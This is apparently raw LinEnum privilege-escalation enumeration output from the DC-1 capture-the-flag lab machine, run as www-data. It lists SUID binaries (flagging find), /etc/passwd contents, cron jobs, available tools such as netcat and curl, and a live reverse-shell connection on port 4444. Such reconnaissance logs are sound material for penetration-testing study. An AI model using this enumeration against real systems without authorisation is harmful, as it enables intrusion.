 407 www-data  4400  0.0  0.0   1876   452 ?        S    01:08   0:00 tee -a
 408 www-data  4570  0.0  0.1   3536  1092 ?        S    01:08   0:00 /bin/bash ./LinEnum.sh
 409 www-data  4571  0.0  0.0   2832   996 ?        R    01:08   0:00 ps aux
 410 
 411 
 412 [00;31m[-] Process binaries and associated permissions (from above list):[00m
 413 -rwxr-xr-x 1 root root   941252 Oct 27  2016 /bin/bash
 414 lrwxrwxrwx 1 root root        4 Mar  1  2012 /bin/sh -> dash
 415 -rwxr-xr-x 2 root root    26684 Dec 10  2012 /sbin/getty
 416 -rwxr-xr-x 1 root root    68180 May 22  2013 /sbin/rpc.statd
 417 -rwxr-xr-x 1 root root    42836 May 10  2017 /sbin/rpcbind
 418 -rwxr-xr-x 1 root root   436576 Feb 10  2015 /usr/bin/dbus-daemon
 419 -rwxr-xr-x 1 root root    42748 Apr 16  2013 /usr/sbin/acpid
 420 lrwxrwxrwx 1 root root       34 May 30  2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
 421 -rwxr-xr-x 1 root root    21812 Oct  4  2014 /usr/sbin/atd
 422 -rwxr-xr-x 1 root root    43020 Jul  4  2012 /usr/sbin/cron
 423 -rwsr-xr-x 1 root root   937564 Feb 11  2018 /usr/sbin/exim4
 424 -rwxr-xr-x 1 root root 10585256 Apr 20  2018 /usr/sbin/mysqld
 425 -rwxr-xr-x 1 root root    28832 May 22  2013 /usr/sbin/rpc.idmapd
 426 -rwxr-xr-x 1 root root   388200 Oct  8  2014 /usr/sbin/rsyslogd
 427 -rwxr-xr-x 1 root root   531888 Jan 27  2018 /usr/sbin/sshd
 428 
 429 
 430 [00;31m[-] /etc/init.d/ binary permissions:[00m
 431 total 280
 432 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
 433 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 434 -rw-r--r--  1 root root 1586 Feb 19 23:02 .depend.boot
 435 -rw-r--r--  1 root root  669 Feb 19 23:02 .depend.start
 436 -rw-r--r--  1 root root  769 Feb 19 23:02 .depend.stop
 437 -rw-r--r--  1 root root 2427 Oct 16  2012 README
 438 -rwxr-xr-x  1 root root 2227 Apr 16  2013 acpid
 439 -rwxr-xr-x  1 root root 7820 May 26  2018 apache2
 440 -rwxr-xr-x  1 root root 1071 Jun 25  2011 atd
 441 -rwxr-xr-x  1 root root 1276 Oct 16  2012 bootlogs
 442 -rwxr-xr-x  1 root root 1281 Jul 15  2013 bootmisc.sh
 443 -rwxr-xr-x  1 root root 3816 Jul 15  2013 checkfs.sh
 444 -rwxr-xr-x  1 root root 1099 Jul 15  2013 checkroot-bootclean.sh
 445 -rwxr-xr-x  1 root root 9673 Jul 15  2013 checkroot.sh
 446 -rwxr-xr-x  1 root root 1379 Dec  9  2011 console-setup
 447 -rwxr-xr-x  1 root root 3033 Jul  3  2012 cron
 448 -rwxr-xr-x  1 root root 2813 Feb  6  2015 dbus
 449 -rwxr-xr-x  1 root root 6435 Feb 11  2018 exim4
 450 -rwxr-xr-x  1 root root 1329 Oct 16  2012 halt
 451 -rwxr-xr-x  1 root root 1423 Oct 16  2012 hostname.sh
 452 -rwxr-xr-x  1 root root 3880 Dec 10  2012 hwclock.sh
 453 -rwxr-xr-x  1 root root 7592 Apr 28  2012 kbd
 454 -rwxr-xr-x  1 root root 1591 Oct  1  2012 keyboard-setup
 455 -rwxr-xr-x  1 root root 1293 Oct 16  2012 killprocs
 456 -rwxr-xr-x  1 root root 1990 May 21  2012 kmod
 457 -rwxr-xr-x  1 root root 2405 Sep 26  2016 mcstrans
 458 -rwxr-xr-x  1 root root  995 Oct 16  2012 motd
 459 -rwxr-xr-x  1 root root  670 Feb 24  2013 mountall-bootclean.sh
 460 -rwxr-xr-x  1 root root 2128 Feb 24  2013 mountall.sh
 461 -rwxr-xr-x  1 root root 1508 Jul 15  2013 mountdevsubfs.sh
 462 -rwxr-xr-x  1 root root 1413 Jul 15  2013 mountkernfs.sh
 463 -rwxr-xr-x  1 root root  678 Feb 24  2013 mountnfs-bootclean.sh
 464 -rwxr-xr-x  1 root root 2440 Oct 16  2012 mountnfs.sh
 465 -rwxr-xr-x  1 root root 1731 Jul 15  2013 mtab.sh
 466 -rwxr-xr-x  1 root root 5437 Apr 19  2018 mysql
 467 -rwxr-xr-x  1 root root 4322 Mar 14  2013 networking
 468 -rwxr-xr-x  1 root root 6491 May 22  2013 nfs-common
 469 -rwxr-xr-x  1 root root 1346 May 20  2012 procps
 470 -rwxr-xr-x  1 root root 6120 Oct 16  2012 rc
 471 -rwxr-xr-x  1 root root  782 Oct 16  2012 rc.local
 472 -rwxr-xr-x  1 root root  117 Oct 16  2012 rcS
 473 -rwxr-xr-x  1 root root  639 Oct 16  2012 reboot
 474 -rwxr-xr-x  1 root root 2727 Sep 26  2016 restorecond
 475 -rwxr-xr-x  1 root root 1074 Jul 15  2013 rmnologin
 476 -rwxr-xr-x  1 root root 2344 May 10  2017 rpcbind
 477 -rwxr-xr-x  1 root root 3054 Oct  8  2014 rsyslog
 478 -rwxr-xr-x  1 root root 3200 Oct 16  2012 sendsigs
 479 -rwxr-xr-x  1 root root  590 Oct 16  2012 single
 480 -rw-r--r--  1 root root 4290 Oct 16  2012 skeleton
 481 -rwxr-xr-x  1 root root 3881 Apr 15  2016 ssh
 482 -rwxr-xr-x  1 root root 8827 Nov  9  2012 udev
 483 -rwxr-xr-x  1 root root 1179 Aug 20  2012 udev-mtab
 484 -rwxr-xr-x  1 root root 2721 Apr 10  2013 umountfs
 485 -rwxr-xr-x  1 root root 2195 Apr 10  2013 umountnfs.sh
 486 -rwxr-xr-x  1 root root 1122 Oct 16  2012 umountroot
 487 -rwxr-xr-x  1 root root 3111 Oct 16  2012 urandom
 488 -rwxr-xr-x  1 root root 1364 Oct 26  2015 virtualbox-guest-utils
 489 -rwxr-xr-x  1 root root 2666 Mar  3  2012 x11-common
 490 
 491 
 492 [00;31m[-] /etc/init/ config file permissions:[00m
 493 total 48
 494 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 495 drwxr-xr-x 85 root root 4096 May  7 00:08 ..
 496 -rw-r--r--  1 root root  523 Mar 14  2013 network-interface-container.conf
 497 -rw-r--r--  1 root root 1603 Mar 14  2013 network-interface-security.conf
 498 -rw-r--r--  1 root root  803 Mar 14  2013 network-interface.conf
 499 -rw-r--r--  1 root root 1898 Mar 14  2013 networking.conf
 500 -rw-r--r--  1 root root  567 Feb 24  2013 startpar-bridge.conf
 501 -rw-r--r--  1 root root  637 Nov  5  2012 udev-fallback-graphics.conf
 502 -rw-r--r--  1 root root  769 Nov  5  2012 udev-finish.conf
 503 -rw-r--r--  1 root root  322 Nov  5  2012 udev.conf
 504 -rw-r--r--  1 root root  356 Nov  5  2012 udevmonitor.conf
 505 -rw-r--r--  1 root root  352 Nov  5  2012 udevtrigger.conf
 506 
 507 
 508 [00;31m[-] /lib/systemd/* config file permissions:[00m
 509 /lib/systemd/:
 510 total 4.0K
 511 drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system
 512 
 513 /lib/systemd/system:
 514 total 56K
 515 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants
 516 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants
 517 drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants
 518 drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants
 519 -rw-r--r-- 1 root root  353 Feb 10  2015 dbus.service
 520 -rw-r--r-- 1 root root  106 Feb 10  2015 dbus.socket
 521 -rw-r--r-- 1 root root  190 Oct  8  2014 rsyslog.service
 522 -rw-r--r-- 1 root root  164 Apr 29  2013 udev-control.socket
 523 -rw-r--r-- 1 root root  177 Apr 29  2013 udev-kernel.socket
 524 -rw-r--r-- 1 root root  752 Apr 29  2013 udev-settle.service
 525 -rw-r--r-- 1 root root  291 Apr 29  2013 udev-trigger.service
 526 -rw-r--r-- 1 root root  384 Apr 29  2013 udev.service
 527 -rw-r--r-- 1 root root  155 Apr 16  2013 acpid.service
 528 -rw-r--r-- 1 root root  115 Apr 16  2013 acpid.socket
 529 
 530 /lib/systemd/system/dbus.target.wants:
 531 total 0
 532 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
 533 
 534 /lib/systemd/system/multi-user.target.wants:
 535 total 0
 536 lrwxrwxrwx 1 root root 15 Feb 10  2015 dbus.service -> ../dbus.service
 537 
 538 /lib/systemd/system/sockets.target.wants:
 539 total 0
 540 lrwxrwxrwx 1 root root 14 Feb 10  2015 dbus.socket -> ../dbus.socket
 541 lrwxrwxrwx 1 root root 22 Apr 29  2013 udev-control.socket -> ../udev-control.socket
 542 lrwxrwxrwx 1 root root 21 Apr 29  2013 udev-kernel.socket -> ../udev-kernel.socket
 543 
 544 /lib/systemd/system/basic.target.wants:
 545 total 0
 546 lrwxrwxrwx 1 root root 23 Apr 29  2013 udev-trigger.service -> ../udev-trigger.service
 547 lrwxrwxrwx 1 root root 15 Apr 29  2013 udev.service -> ../udev.service
 548 
 549 
 550 [00;33m### SOFTWARE #############################################[00m
 551 [00;31m[-] MYSQL version:[00m
 552 mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2
 553 
 554 
 555 [00;31m[-] Apache user configuration:[00m
 556 APACHE_RUN_USER=www-data
 557 APACHE_RUN_GROUP=www-data
 558 
 559 
 560 [00;33m### INTERESTING FILES ####################################[00m
 561 [00;31m[-] Useful file locations:[00m
 562 /bin/nc
 563 /bin/netcat
 564 /usr/bin/wget
 565 /usr/bin/gcc
 566 /usr/bin/curl
 567 
 568 
 569 [00;31m[-] Installed compilers:[00m
 570 ii  checkpolicy                        2.1.8-2                          i386         SELinux policy compiler
 571 ii  gcc                                4:4.7.2-1                        i386         GNU C compiler
 572 ii  gcc-4.7                            4.7.2-5                          i386         GNU C compiler
 573 ii  gcc-4.7-multilib                   4.7.2-5                          i386         GNU C compiler (multilib files)
 574 ii  gcc-multilib                       4:4.7.2-1                        i386         GNU C compiler (multilib files)
 575 
 576 
 577 [00;31m[-] Can we read/write sensitive files:[00m
 578 -rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
 579 -rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
 580 -rw-r--r-- 1 root root 851 Jul 30  2011 /etc/profile
 581 -rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow
 582 
 583 
 584 [00;31m[-] SUID files:[00m
 585 -rwsr-xr-x 1 root root 88744 Dec 10  2012 /bin/mount
 586 -rwsr-xr-x 1 root root 31104 Apr 13  2011 /bin/ping
 587 -rwsr-xr-x 1 root root 35200 Feb 27  2017 /bin/su
 588 -rwsr-xr-x 1 root root 35252 Apr 13  2011 /bin/ping6
 589 -rwsr-xr-x 1 root root 67704 Dec 10  2012 /bin/umount
 590 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
 591 -rwsr-xr-x 1 root root 35892 Feb 27  2017 /usr/bin/chsh
 592 -rwsr-xr-x 1 root root 45396 Feb 27  2017 /usr/bin/passwd
 593 -rwsr-xr-x 1 root root 30880 Feb 27  2017 /usr/bin/newgrp
 594 -rwsr-xr-x 1 root root 44564 Feb 27  2017 /usr/bin/chfn
 595 -rwsr-xr-x 1 root root 66196 Feb 27  2017 /usr/bin/gpasswd
 596 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
 597 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
 598 -rwsr-xr-x 1 root root 937564 Feb 11  2018 /usr/sbin/exim4
 599 -rwsr-xr-x 1 root root 9660 Jun 20  2017 /usr/lib/pt_chown
 600 -rwsr-xr-x 1 root root 248036 Jan 27  2018 /usr/lib/openssh/ssh-keysign
 601 -rwsr-xr-x 1 root root 5412 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
 602 -rwsr-xr-- 1 root messagebus 321692 Feb 10  2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 603 -rwsr-xr-x 1 root root 84532 May 22  2013 /sbin/mount.nfs
 604 
 605 
 606 [00;33m[+] Possibly interesting SUID files:[00m
 607 -rwsr-xr-x 1 root root 162424 Jan  6  2012 /usr/bin/find
 608 
 609 
 610 [00;31m[-] SGID files:[00m
 611 -rwxr-sr-x 1 root ssh 128396 Jan 27  2018 /usr/bin/ssh-agent
 612 -rwsr-sr-x 1 daemon daemon 50652 Oct  4  2014 /usr/bin/at
 613 -rwxr-sr-x 1 root mlocate 30492 Sep 25  2010 /usr/bin/mlocate
 614 -rwxr-sr-x 1 root mail 17908 Nov 18  2017 /usr/bin/lockfile
 615 -rwxr-sr-x 1 root shadow 49364 Feb 27  2017 /usr/bin/chage
 616 -rwxr-sr-x 1 root tty 9708 Jun 11  2012 /usr/bin/bsd-write
 617 -rwxr-sr-x 1 root mail 9768 Nov 30  2014 /usr/bin/mutt_dotlock
 618 -rwxr-sr-x 1 root tty 18020 Dec 10  2012 /usr/bin/wall
 619 -rwxr-sr-x 1 root crontab 34760 Jul  4  2012 /usr/bin/crontab
 620 -rwxr-sr-x 1 root shadow 18168 Feb 27  2017 /usr/bin/expiry
 621 -rwsr-sr-x 1 root mail 83912 Nov 18  2017 /usr/bin/procmail
 622 -rwxr-sr-x 1 root mail 13960 Dec 12  2012 /usr/bin/dotlockfile
 623 -rwxr-sr-x 1 root utmp 4972 Feb 21  2011 /usr/lib/utempter/utempter
 624 -rwxr-sr-x 1 root shadow 30332 May  5  2012 /sbin/unix_chkpwd
 625 
 626 
 627 [-] Can't search *.conf files as no keyword was entered
 628 
 629 [-] Can't search *.php files as no keyword was entered
 630 
 631 [-] Can't search *.log files as no keyword was entered
 632 
 633 [-] Can't search *.ini files as no keyword was entered
 634 
 635 [00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
 636 -rw-r--r-- 1 root root 45 May  7 01:08 /etc/resolv.conf
 637 -rw-r--r-- 1 root root 346 Mar 31  2012 /etc/discover-modprobe.conf
 638 -rw-r--r-- 1 root root 216 Sep 26  2016 /etc/sestatus.conf
 639 -rw-r--r-- 1 root root 1260 May 30  2008 /etc/ucf.conf
 640 -rw-r--r-- 1 root root 834 Jun  8  2012 /etc/gssapi_mech.conf
 641 -rw-r--r-- 1 root root 859 Nov 24  2012 /etc/insserv.conf
 642 -rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
 643 -rw-r--r-- 1 root root 3173 Dec 16  2017 /etc/reportbug.conf
 644 -rw-r--r-- 1 root root 599 Feb 19  2009 /etc/logrotate.conf
 645 -rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
 646 -rw-r--r-- 1 root root 284 Sep 25  2010 /etc/updatedb.conf
 647 -rw-r--r-- 1 root root 191 Feb  1  2012 /etc/libaudit.conf
 648 -rw-r--r-- 1 root root 604 May 16  2012 /etc/deluser.conf
 649 -rw-r--r-- 1 root root 2940 Feb 12  2016 /etc/gai.conf
 650 -rw-r--r-- 1 root root 2632 Oct  8  2014 /etc/rsyslog.conf
 651 -rw-r--r-- 1 root root 2082 May 20  2012 /etc/sysctl.conf
 652 -rw-r--r-- 1 root root 214 May 11  2013 /etc/idmapd.conf
 653 -rw-r--r-- 1 root root 956 Feb 22  2015 /etc/mke2fs.conf
 654 -rw-r--r-- 1 root root 552 Apr 30  2012 /etc/pam.conf
 655 -rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
 656 -rw-r--r-- 1 root root 2969 Dec 26  2012 /etc/debconf.conf
 657 -rw-r--r-- 1 root root 9 Aug  8  2006 /etc/host.conf
 658 -rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf
 659 -rw-r--r-- 1 root root 475 Aug 29  2006 /etc/nsswitch.conf
 660 
 661 
 662 [00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
 663 /home/flag4/.bash_history
 664 cd 
 665 ls
 666 vi flag4.txt
 667 ls
 668 exit
 669 
 670 
 671 [00;31m[-] Any interesting mail in /var/mail:[00m
 672 total 8
 673 drwxrwsr-x  2 root mail 4096 Feb 19 22:24 .
 674 drwxr-xr-x 12 root root 4096 Feb 19 23:10 ..
 675 
 676 
 677 [00;33m### SCAN COMPLETE ####################################[00m
 678 
 679 [00;31m#########################################################[00m
 680 [00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
 681 [00;31m#########################################################[00m
 682 [00;33m# www.rebootuser.com[00m
 683 [00;33m# version 0.95[00m
 684 
 685 [-] Debug Info
 686 [00;33m[+] Thorough tests = Disabled[00m
 687 
 688 
 689 [00;33mScan started at:
 690 Tue May  7 01:08:52 AEST 2019
 691 [00m
 692 
 693 [00;33m### SYSTEM ##############################################[00m
 694 [00;31m[-] Kernel information:[00m
 695 Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
 696 
 697 
 698 [00;31m[-] Kernel information (continued):[00m
 699 Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1
 700 
 701 
 702 [00;31m[-] Specific release information:[00m
 703 PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
 704 NAME="Debian GNU/Linux"
 705 VERSION_ID="7"
 706 VERSION="7 (wheezy)"
 707 ID=debian
 708 ANSI_COLOR="1;31"
 709 HOME_URL="http://www.debian.org/"
 710 SUPPORT_URL="http://www.debian.org/support/"
 711 BUG_REPORT_URL="http://bugs.debian.org/"
 712 
 713 
 714 [00;31m[-] Hostname:[00m
 715 DC-1
 716 
 717 
 718 [00;33m### USER/GROUP ##########################################[00m
 719 [00;31m[-] Current user/group info:[00m
 720 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 721 
 722 
 723 [00;31m[-] Users that have previously logged onto the system:[00m
 724 Username         Port     From             Latest
 725 root             tty1                      Thu Feb 28 12:10:51 +1000 2019
 726 
 727 
 728 [00;31m[-] Who else is logged on:[00m
 729  01:08:52 up  1:00,  0 users,  load average: 0.00, 0.00, 0.00
 730 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 731 
 732 
 733 [00;31m[-] Group memberships:[00m
 734 uid=0(root) gid=0(root) groups=0(root)
 735 uid=1(daemon) gid=1(daemon) groups=1(daemon)
 736 uid=2(bin) gid=2(bin) groups=2(bin)
 737 uid=3(sys) gid=3(sys) groups=3(sys)
 738 uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
 739 uid=5(games) gid=60(games) groups=60(games)
 740 uid=6(man) gid=12(man) groups=12(man)
 741 uid=7(lp) gid=7(lp) groups=7(lp)
 742 uid=8(mail) gid=8(mail) groups=8(mail)
 743 uid=9(news) gid=9(news) groups=9(news)
 744 uid=10(uucp) gid=10(uucp) groups=10(uucp)
 745 uid=13(proxy) gid=13(proxy) groups=13(proxy)
 746 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 747 uid=34(backup) gid=34(backup) groups=34(backup)
 748 uid=38(list) gid=38(list) groups=38(list)
 749 uid=39(irc) gid=39(irc) groups=39(irc)
 750 uid=41(gnats) gid=41(gnats) groups=41(gnats)
 751 uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
 752 uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
 753 uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
 754 uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
 755 uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
 756 uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
 757 uid=105(mysql) gid=109(mysql) groups=109(mysql)
 758 uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)
 759 
 760 
 761 [00;31m[-] Contents of /etc/passwd:[00m
 762 root:x:0:0:root:/root:/bin/bash
 763 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 764 bin:x:2:2:bin:/bin:/bin/sh
 765 sys:x:3:3:sys:/dev:/bin/sh
 766 sync:x:4:65534:sync:/bin:/bin/sync
 767 games:x:5:60:games:/usr/games:/bin/sh
 768 man:x:6:12:man:/var/cache/man:/bin/sh
 769 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 770 mail:x:8:8:mail:/var/mail:/bin/sh
 771 news:x:9:9:news:/var/spool/news:/bin/sh
 772 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 773 proxy:x:13:13:proxy:/bin:/bin/sh
 774 www-data:x:33:33:www-data:/var/www:/bin/sh
 775 backup:x:34:34:backup:/var/backups:/bin/sh
 776 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 777 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 778 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 779 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 780 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 781 Debian-exim:x:101:104::/var/spool/exim4:/bin/false
 782 statd:x:102:65534::/var/lib/nfs:/bin/false
 783 messagebus:x:103:107::/var/run/dbus:/bin/false
 784 sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
 785 mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
 786 flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
 787 
 788 
 789 [00;31m[-] Super user account(s):[00m
 790 root
 791 
 792 
 793 [00;31m[-] Are permissions on /home directories lax:[00m
 794 total 12K
 795 drwxr-xr-x  3 root  root  4.0K Feb 19 23:51 .
 796 drwxr-xr-x 23 root  root  4.0K Feb 19 22:34 ..
 797 drwxr-xr-x  2 flag4 flag4 4.0K Feb 19 23:28 flag4
 798 
 799 
 800 [00;31m[-] Root is allowed to login via SSH:[00m
 801 PermitRootLogin yes
 802 
 803 
 804 [00;33m### ENVIRONMENTAL #######################################[00m
 805 [00;31m[-] Environment information:[00m
 806 APACHE_PID_FILE=/var/run/apache2.pid
 807 APACHE_RUN_USER=www-data
 808 APACHE_LOG_DIR=/var/log/apache2
 809 PATH=/usr/local/bin:/usr/bin:/bin
 810 PWD=/var/www
 811 APACHE_RUN_GROUP=www-data
 812 LANG=C
 813 SHLVL=1
 814 APACHE_LOCK_DIR=/var/lock/apache2
 815 APACHE_RUN_DIR=/var/run/apache2
 816 _=/usr/bin/env
 817 
 818 
 819 [00;31m[-] Path information:[00m
 820 /usr/local/bin:/usr/bin:/bin
 821 
 822 
 823 [00;31m[-] Available shells:[00m
 824 # /etc/shells: valid login shells
 825 /bin/sh
 826 /bin/dash
 827 /bin/bash
 828 /bin/rbash
 829 
 830 
 831 [00;31m[-] Current umask value:[00m
 832 0022
 833 u=rwx,g=rx,o=rx
 834 
 835 
 836 [00;31m[-] umask value as specified in /etc/login.defs:[00m
 837 UMASK        022
 838 
 839 
 840 [00;31m[-] Password and storage information:[00m
 841 PASS_MAX_DAYS    99999
 842 PASS_MIN_DAYS    0
 843 PASS_WARN_AGE    7
 844 ENCRYPT_METHOD SHA512
 845 
 846 
 847 [00;33m### JOBS/TASKS ##########################################[00m
 848 [00;31m[-] Cron jobs:[00m
 849 -rw-r--r-- 1 root root  722 Jul  4  2012 /etc/crontab
 850 
 851 /etc/cron.d:
 852 total 16
 853 drwxr-xr-x  2 root root 4096 Feb 19 23:01 .
 854 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 855 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 856 -rw-r--r--  1 root root  510 May 10  2018 php5
 857 
 858 /etc/cron.daily:
 859 total 68
 860 drwxr-xr-x  2 root root  4096 Feb 19 23:01 .
 861 drwxr-xr-x 85 root root  4096 May  7 01:08 ..
 862 -rw-r--r--  1 root root   102 Jul  4  2012 .placeholder
 863 -rwxr-xr-x  1 root root   633 May 30  2018 apache2
 864 -rwxr-xr-x  1 root root 14985 Oct 24  2014 apt
 865 -rwxr-xr-x  1 root root   314 Nov  5  2012 aptitude
 866 -rwxr-xr-x  1 root root   355 Jun 11  2012 bsdmainutils
 867 -rwxr-xr-x  1 root root   256 May  3  2016 dpkg
 868 -rwxr-xr-x  1 root root  4125 Feb 11  2018 exim4-base
 869 -rwxr-xr-x  1 root root    89 May 17  2012 logrotate
 870 -rwxr-xr-x  1 root root  1365 Jun 19  2012 man-db
 871 -rwxr-xr-x  1 root root   606 Sep 25  2010 mlocate
 872 -rwxr-xr-x  1 root root   249 May 26  2012 passwd
 873 
 874 /etc/cron.hourly:
 875 total 12
 876 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 877 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 878 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 879 
 880 /etc/cron.monthly:
 881 total 12
 882 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 883 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 884 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 885 
 886 /etc/cron.weekly:
 887 total 16
 888 drwxr-xr-x  2 root root 4096 Feb 19 22:25 .
 889 drwxr-xr-x 85 root root 4096 May  7 01:08 ..
 890 -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
 891 -rwxr-xr-x  1 root root  907 Jun 19  2012 man-db
 892 
 893 
 894 [00;31m[-] Crontab contents:[00m
 895 # /etc/crontab: system-wide crontab
 896 # Unlike any other crontab you don't have to run the `crontab'
 897 # command to install the new version when you edit this file
 898 # and files in /etc/cron.d. These files also have username fields,
 899 # that none of the other crontabs do.
 900 
 901 SHELL=/bin/sh
 902 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
 903 
 904 # m h dom mon dow user    command
 905 17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
 906 25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
 907 47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
 908 52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
 909 #
 910 
 911 
 912 [00;33m### NETWORKING  ##########################################[00m
 913 [00;31m[-] Network and IP info:[00m
 914 eth0      Link encap:Ethernet  HWaddr 00:0c:29:d1:f4:98  
 915           inet addr:192.168.16.107  Bcast:192.168.16.255  Mask:255.255.255.0
 916           inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
 917           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
 918           RX packets:8711 errors:0 dropped:0 overruns:0 frame:0
 919           TX packets:3014 errors:0 dropped:0 overruns:0 carrier:0
 920           collisions:0 txqueuelen:1000 
 921           RX bytes:1327204 (1.2 MiB)  TX bytes:1104845 (1.0 MiB)
 922 
 923 lo        Link encap:Local Loopback  
 924           inet addr:127.0.0.1  Mask:255.0.0.0
 925           inet6 addr: ::1/128 Scope:Host
 926           UP LOOPBACK RUNNING  MTU:16436  Metric:1
 927           RX packets:50 errors:0 dropped:0 overruns:0 frame:0
 928           TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
 929           collisions:0 txqueuelen:0 
 930           RX bytes:4852 (4.7 KiB)  TX bytes:4852 (4.7 KiB)
 931 
 932 
 933 [00;31m[-] ARP history:[00m
 934 192.168.16.112 dev eth0  INCOMPLETE
 935 
 936 
 937 [00;31m[-] Nameserver(s):[00m
 938 nameserver 192.168.16.254
 939 nameserver 0.0.0.0
 940 
 941 
 942 [00;31m[-] Default route:[00m
 943 default via 192.168.16.254 dev eth0 
 944 
 945 
 946 [00;31m[-] Listening TCP:[00m
 947 Active Internet connections (servers and established)
 948 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 949 tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
 950 tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
 951 tcp        0      0 0.0.0.0:40858           0.0.0.0:*               LISTEN      -               
 952 tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
 953 tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
 954 tcp        0    480 192.168.16.107:33469    192.168.16.112:4444     ESTABLISHED 3406/php        
 955 tcp6       0      0 :::22                   :::*                    LISTEN      -               
 956 tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
 957 tcp6       0      0 :::34190                :::*                    LISTEN      -               
 958 tcp6       0      0 :::111                  :::*                    LISTEN      -               
 959 tcp6       0      0 :::80                   :::*                    LISTEN      -               
 960 tcp6       0      0 192.168.16.107:80       192.168.16.112:52090    TIME_WAIT   -               
 961 tcp6       1      0 192.168.16.107:80       192.168.16.112:63539    CLOSE_WAIT  -               
 962 
 963 
 964 [00;31m[-] Listening UDP:[00m
 965 Active Internet connections (servers and established)
 966 Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
 967 udp        0      0 0.0.0.0:59942           0.0.0.0:*                           -               
 968 udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
 969 udp        0      0 0.0.0.0:111             0.0.0.0:*                           -               
 970 udp        0      0 0.0.0.0:769             0.0.0.0:*                           -               
 971 udp        0      0 127.0.0.1:801           0.0.0.0:*                           -               
 972 udp        0      0 0.0.0.0:21881           0.0.0.0:*                           -               
 973 udp6       0      0 :::52815                :::*                                -               
 974 udp6       0      0 :::28256                :::*                                -               
 975 udp6       0      0 :::111                  :::*                                -               
 976 udp6       0      0 :::769                  :::*                                -               
 977 
 978 
 979 [00;33m### SERVICES #############################################[00m
 980 [00;31m[-] Running processes:[00m
